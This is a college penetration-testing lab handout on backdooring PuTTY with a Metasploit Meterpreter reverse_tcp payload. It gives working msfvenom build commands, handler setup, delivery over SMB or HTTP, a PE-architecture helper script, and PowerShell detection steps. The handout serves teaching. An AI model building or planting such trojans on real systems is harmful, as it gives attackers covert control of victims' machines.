[Lab-Pentest] Metasploit RAT

School: Madison Area Technical College, Madison
Course: 804-208
Subject: Computer Science
Date: Dec 6, 2023

[Lab-Pentest] Metasploit RAT

Introduction

A Remote Access Trojan (RAT) is an application that attackers use to covertly control a targeted machine. In this lab we use msfvenom to create a RAT, and msfconsole to create a handler that receives the incoming connection from the RAT and lets us interact with the targeted machine. The target systems are Windows Server 2008 R2 and Windows 10; the Kali Linux machine is the attacker.

There are three stages to this type of attack. First, we create a malicious executable. Next, we deploy the RAT to the target machine. Finally, we wait for the target to connect back to the attacking system.

Background

The following sections provide information about your payloads.

32-bit or 64-bit

The sample executable could be compiled as either a 32-bit or a 64-bit application. If we build our trojan for the wrong architecture, our backdoor will not work. The Windows PE (Portable Executable) format defines many machine types, but we are only concerned with two. The Value column is the Machine field as documented; the Bytes column is how it appears in the file, because the field is stored little-endian.

Constant                   Value    Bytes in file   Description
IMAGE_FILE_MACHINE_AMD64   0x8664   64 86           x64
IMAGE_FILE_MACHINE_I386    0x14c    4c 01           Intel 386 or later processors and compatible processors

We need to check whether the executable we downloaded is 64-bit or 32-bit. A quick and easy way to do this is with hexdump (already installed on Kali Linux):

hexdump -C -n 200 <base file>.exe

What we are looking for is the line that contains "PE". Note: the PE signature is not at a fixed position. Its file offset is stored in the 4-byte little-endian field at offset 0x3c of the DOS header (e_lfanew), so if "PE" does not appear in the first 200 bytes, increase the -n value or read the offset at 0x3c and dump from there. The Machine field is the two bytes immediately after the four-byte "PE\0\0" signature.
32-bit executable: the line containing the letters PE shows the byte pattern 50 45 00 00 4c 01.
64-bit executable: the line containing the letters PE shows the byte pattern 50 45 00 00 64 86.

Lab Activities

The following sections walk you through the process of building a RAT, deploying it to your target and executing it to deliver your payload.

Build the trojan into the base executable

Depending on the architecture of our target, we need to select a payload that matches. Note: the payload and the template executable must be the same architecture. Putting a 64-bit payload into a 32-bit template, or a 32-bit payload into a 64-bit template, will not work. A 32-bit backdoored executable still runs on 64-bit Windows (under WoW64), but the handler's PAYLOAD must then be the 32-bit payload you built.

MSFVenom

msfvenom is Metasploit's standalone payload generator. We use it when we want to make file-based Metasploit payloads. Payloads can also be created in msfconsole, but that interface is missing a few key features needed for file-based executables (there is no --keep option). To keep things organized, it is usually a good idea to make a dedicated directory to build your trojan executables in (you don't want to lose track of these).

To review all of the available options for a payload, execute msfvenom with the --payload-options argument:

msfvenom --payload-options -p windows/x64/meterpreter/reverse_tcp

For this lab, the following options will be used to generate the malicious version of PuTTY.
-a [--arch]         The architecture to use
--platform          The platform of the payload
-p [--payload]      Payload to use
-e [--encoder]      The encoder to use
-i [--iterations]   The number of times to encode the payload
-f [--format]       Output format (use --help-formats for a list)
-x [--template]     Specify a custom executable file to use as a template
-o [--out]          Save the payload to <filename>
-k [--keep]         Preserve the template behavior (the original program still runs; the payload executes alongside it)

Windows x64 [64-bit]. Note: You must use a 64-bit application template!

msfvenom -a x64 --platform windows -x putty-64.exe -k -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.10 lport=31337 -f exe -o putty-backdoor.exe

Windows x86 [32-bit]. Note: You must use a 32-bit application template!

msfvenom -a x86 --platform windows -x putty-32.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=31337 -e x86/shikata_ga_nai -i 3 -f exe -o putty-backdoor.exe

In both commands lhost is the Kali machine's address and lport is the port the handler (below) will listen on.

Command and Control Server [C2]

We need a way to control the target system once our RAT is running on it. Metasploit Framework provides the exploit/multi/handler module for this purpose.

Metasploit Handler

The Metasploit multi-handler is a generic server whose behavior depends on the PAYLOAD we set. Here we tell it to listen on port 31337 for a meterpreter/reverse_tcp connection. PAYLOAD, LHOST and LPORT must match the values used when the executable was generated; for the 32-bit build, set PAYLOAD to windows/meterpreter/reverse_tcp instead.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.10
msf exploit(multi/handler) > set LPORT 31337
msf exploit(multi/handler) > run

We are now ready to receive connections from our RAT. Next, we need to deploy the RAT to the target system.

Deploy the RAT

The following sections discuss two techniques to move your RAT onto the target system.

Using smbclient

The smbclient utility can be used to move files onto a Windows system that exposes the SMB service. Note that this technique will not work against systems that filter inbound SMB connections with a host-based firewall, and writing to the administrative C$ share requires administrator credentials.

To begin, change to the directory on your Kali system that contains your malicious executables.

[kali] cd ~/assessments/malware/

Next, connect to the target system using the smbclient command in Kali.

[kali] smbclient \\\\192.168.1.1\\c$ -U Administrator
Enter Workgroup\Administrator's password:
smb: \>

Finally, upload your malicious executable to the target system.

smb: \> put putty-backdoor.exe
smb: \> exit

In general, this interaction is similar to a typical FTP transfer, the main difference being the use of SMB instead of FTP. At this point, you have uploaded your malicious executable to the root of the C: drive on the Windows Server 2008 R2 target.

Using Python 3's HTTP server

At this point we have produced an executable file that we need to get onto the target machine and execute. To accomplish this we will use the HTTP server available as a Python 3 module. Ensure you are in the directory that contains the executables you generated using msfvenom and execute the module:

[kali] cd /root/backdoors
[kali] python3 -m http.server
By default, the Python web server listens on TCP port 8000 on all interfaces. To copy the malicious executable to our target, we use a web browser on the target system.

On the targeted system: browse to http://192.168.1.10:8000/ (the Kali machine's address and the server's port) and download putty-backdoor.exe.

Execute the trojan

To execute the RAT on the target system you can either double-click it in the GUI or run it directly from a command shell.

Executing the backdoor from the Windows command shell:

C:\> putty-backdoor.exe

Once executed, you should see a new session created in the Metasploit Framework on the Kali system. At this point you have built a malicious executable, delivered it to your target system, executed it and received a reverse TCP connection that lets you interact with your payload on the target.

Lab Activities

To complete this lab you will generate two new versions of PuTTY that include your backdoor. You can find the current release version of PuTTY here:

https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Your targets are ANY of the Windows machines. Follow the steps outlined previously to complete the lab.
Windows Target (Your Choice)

[ INSERT A SCREENSHOT OF YOUR METERPRETER SESSIONS ]
[ INSERT A SCREENSHOT OF THE PUTTY EXECUTABLE RUNNING ON WINDOWS ]
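The architecture check in the Background section and the template selection in the build step are easy to get wrong by eyeballing hexdump output. The following script is an added example for this lab, not code from the original document or from Metasploit. It reads the PE headers the way the Microsoft PE/COFF documentation in the references describes them (e_lfanew at offset 0x3c, then the "PE\0\0" signature, then the two-byte Machine field), maps the Machine value to the msfvenom -a and -p values the lab uses, and lists the section table so you can compare the clean template with the msfvenom -k output. The file names, addresses and the build_minimal_pe() image are assumptions made up for the example; the constructed image is headers only and is not a runnable program.

```python
"""Check a PE template's architecture before handing it to msfvenom.

Added example for this lab (not the lab's or Metasploit's own code). Layout
per the PE/COFF spec: e_lfanew at 0x3c, "PE\\0\\0" signature, 20-byte COFF
header starting with the little-endian Machine field, optional header, then
40-byte section headers. Names and addresses below are assumptions.
"""
import struct
import sys

PE_SIGNATURE = b"PE\0\0"

# Machine values from the table in the Background section.
MACHINE_ARCH = {
    0x014C: "x86",   # IMAGE_FILE_MACHINE_I386, appears in the file as 4c 01
    0x8664: "x64",   # IMAGE_FILE_MACHINE_AMD64, appears in the file as 64 86
}

# msfvenom payload names used in the lab, keyed by architecture.
PAYLOADS = {
    "x86": "windows/meterpreter/reverse_tcp",
    "x64": "windows/x64/meterpreter/reverse_tcp",
}


def pe_signature_offset(data: bytes) -> int:
    """Return e_lfanew after validating the MZ and PE signatures."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # The signature is wherever the linker put it; a fixed 'hexdump -n 200'
    # can miss it, so trust the offset stored in the DOS header instead.
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("not a PE image: no PE signature at 0x%x" % e_lfanew)
    return e_lfanew


def pe_machine(data: bytes) -> int:
    """Return the Machine field of the COFF file header."""
    off = pe_signature_offset(data)
    (machine,) = struct.unpack_from("<H", data, off + 4)
    return machine


def pe_arch(data: bytes) -> str:
    """Map the Machine field to the msfvenom -a value ('x86' or 'x64')."""
    machine = pe_machine(data)
    if machine not in MACHINE_ARCH:
        raise ValueError("unsupported machine type 0x%04x" % machine)
    return MACHINE_ARCH[machine]


def pe_section_names(data: bytes) -> list:
    """Return the section names; diff template vs. backdoor to spot the
    section msfvenom -k added."""
    coff = pe_signature_offset(data) + 4
    (nsections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_size        # section table follows the optional header
    names = []
    for i in range(nsections):
        raw = data[table + 40 * i:table + 40 * i + 8]   # IMAGE_SECTION_HEADER.Name
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def msfvenom_command(template: str, data: bytes, lhost: str, lport: int,
                     out: str) -> list:
    """Build the lab's msfvenom argv with -a and -p taken from the template's
    real architecture. The lab's 32-bit command also adds -e x86/shikata_ga_nai -i 3."""
    arch = pe_arch(data)
    return ["msfvenom", "-a", arch, "--platform", "windows", "-x", template,
            "-k", "-p", PAYLOADS[arch], "LHOST=%s" % lhost, "LPORT=%d" % lport,
            "-f", "exe", "-o", out]


def build_minimal_pe(machine: int, section_names: list, e_lfanew: int = 0x80) -> bytes:
    """Constructed header-only image so the example runs without a real PuTTY binary."""
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0 here), Characteristics
    coff = struct.pack("<HHIIIHH", machine, len(section_names), 0, 0, 0, 0, 0)
    sections = b"".join(n.encode("ascii").ljust(8, b"\0") + b"\0" * 32
                        for n in section_names)
    return bytes(dos) + PE_SIGNATURE + coff + sections


if __name__ == "__main__":
    # Usage: python3 pe_arch.py putty-64.exe [putty-backdoor.exe ...]
    # With no arguments the constructed image stands in for a template.
    images = {p: open(p, "rb").read() for p in sys.argv[1:]} or \
        {"constructed-x64.exe": build_minimal_pe(0x8664, [".text", ".rdata"])}
    for name, data in images.items():
        print("%s: machine=0x%04x arch=%s sections=%s"
              % (name, pe_machine(data), pe_arch(data), pe_section_names(data)))
    first = next(iter(images))
    print(" ".join(msfvenom_command(first, images[first], "192.168.1.10",
                                    31337, "putty-backdoor.exe")))
```

Run it against the downloaded PuTTY binary to confirm the architecture before building, then again against the template and putty-backdoor.exe together: the backdoor shows the same Machine value but one more section than the template.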
Detection and analysis

We can use a few quick PowerShell commands to study the process that is connecting to our attacker machine. Type powershell in the Windows 10 search bar and select Windows PowerShell.

Next, find all of the connections going to our attacker machine (192.168.1.10, the LHOST used by the handler). This command shows the process ID (the OwningProcess property) that created the connection, and the CreationTime property tells us when the trojan application started the connection.

Get-NetTCPConnection -RemoteAddress 192.168.1.10 | Format-List

Using the process ID we can get much more information about the trojan process, including its executable path and start time.

Get-Process -Id <process number> | Format-List *

And finally we can kill the rogue process and break the attacker's connection. Note that this only ends the current session; the backdoored executable is still on disk and will connect back again if it is run.

Stop-Process -Id <process number>
References

How to use msfvenom: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
Payload Generation (Metasploit Unleashed): https://www.offensive-security.com/metasploit-unleashed/generating-payloads/
Windows PE (Portable Executable) documentation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680547(v=vs.85).aspx